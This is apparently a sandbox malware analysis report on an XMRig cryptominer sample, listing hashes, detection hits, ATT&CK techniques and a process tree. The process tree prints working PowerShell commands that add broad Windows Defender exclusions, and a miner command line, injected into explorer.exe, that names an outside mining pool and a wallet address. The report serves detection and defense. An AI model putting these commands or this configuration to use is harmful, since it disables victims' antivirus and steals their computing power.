xmrig | 0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f

Analysis

max time kernel
16s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20-11-2024 22:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe
Size

2.1MB
MD5

ebb42b2a3a147e19b72b77a3977600c9
SHA1

8e4e8e2384a226ff0840b34610c8ca2ffa4c9240
SHA256

0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f
SHA512

0b54d7ffaff3e44999fde5c74e3a9d3d30370cf1fc9c99268321c815a76c47ed2b906e131e43f8fe1443e1167372bd68ee2f52d5337ff16da858f380d42ddb9b
SSDEEP

49152:KLn083VH2ecNONSbowqPObPca9WO7oB34W0OIFXhE9+oAnTAXUbI:QLy5PLLoB34WNIfE9rWs0I

Score

10^/10

xmrig execution miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2544-42-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-24-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-41-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-38-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-36-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-34-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-33-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-30-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-22-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-47-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-49-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-48-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-46-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-51-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-45-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-28-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2544-26-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2804	powershell.exe
940	powershell.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe

description	pid	Process	procid_target
PID 2644 set thread context of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2804	powershell.exe
940	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exepowershell.exeexplorer.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeLockMemoryPrivilege	2544	explorer.exe
Token: SeLockMemoryPrivilege	2544	explorer.exe
Token: SeDebugPrivilege	940	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.execmd.exe

description	pid	Process	procid_target
PID 2644 wrote to memory of 2776	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	30
PID 2644 wrote to memory of 2776	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	30
PID 2644 wrote to memory of 2776	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	30
PID 2776 wrote to memory of 2804	2776	cmd.exe	32
PID 2776 wrote to memory of 2804	2776	cmd.exe	32
PID 2776 wrote to memory of 2804	2776	cmd.exe	32
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2644 wrote to memory of 2544	2644	0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe	34
PID 2776 wrote to memory of 940	2776	cmd.exe	35
PID 2776 wrote to memory of 940	2776	cmd.exe	35
PID 2776 wrote to memory of 940	2776	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe
"C:\Users\Admin\AppData\Local\Temp\0c65484e7f517cfb24dff4231117a5f115e094f12a6b99aa0c26d322f6dbfb5f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644
- C:\Windows\system32\cmd.exe
  "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=4A7eDpU3RSEEt9kX8KQwwkfmFwWRYQ5EzUe54qzu9HtwVTbHyWmjUu5BJeHjQgGFZv9wv25i7UvRTAzJRKNpBH6s3a4ivKe --pass= --cpu-max-threads-hint=80 --tls
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
27e1a5bc096d8780c0f71fac25242b32

SHA1
30649aa0a517f588553ed2aa3c2b9e4cff03336c

SHA256
28ebf15d254525c5e396bde022981b3e4ff85d21162660f9129398e08736a249

SHA512
e43b766bdf93974a88904cd2520e7a11d431243414655ed232afeafe7e39aca61ee3fe5059adcb9c6f7a15a24e3c03d670c6c940652d94e2a63beb2293a52e27

Download Submit
memory/940-59-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/940-58-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2544-47-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-49-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-34-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-33-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-26-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-30-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-28-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-45-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-16-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-42-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-24-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-51-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-43-0x0000000000270000-0x0000000000290000-memory.dmp

Filesize
128KB

Download
memory/2544-41-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-38-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-36-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-46-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-48-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-40-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/2544-18-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-22-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2544-20-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2644-3-0x000007FEF6230000-0x000007FEF6C1C000-memory.dmp

Filesize
9.9MB

Download
memory/2644-1-0x000000013FC20000-0x000000013FE38000-memory.dmp

Filesize
2.1MB

Download
memory/2644-0-0x000007FEF6233000-0x000007FEF6234000-memory.dmp

Filesize
4KB

Download
memory/2644-44-0x000007FEF6230000-0x000007FEF6C1C000-memory.dmp

Filesize
9.9MB

Download
memory/2804-9-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2804-50-0x000007FEF1FC0000-0x000007FEF295D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-11-0x000007FEF1FC0000-0x000007FEF295D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-12-0x000007FEF1FC0000-0x000007FEF295D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-14-0x000007FEF1FC0000-0x000007FEF295D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-15-0x000007FEF1FC0000-0x000007FEF295D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-8-0x000007FEF227E000-0x000007FEF227F000-memory.dmp

Filesize
4KB

Download
memory/2804-10-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2804-13-0x000007FEF1FC0000-0x000007FEF295D000-memory.dmp

Filesize
9.6MB

Download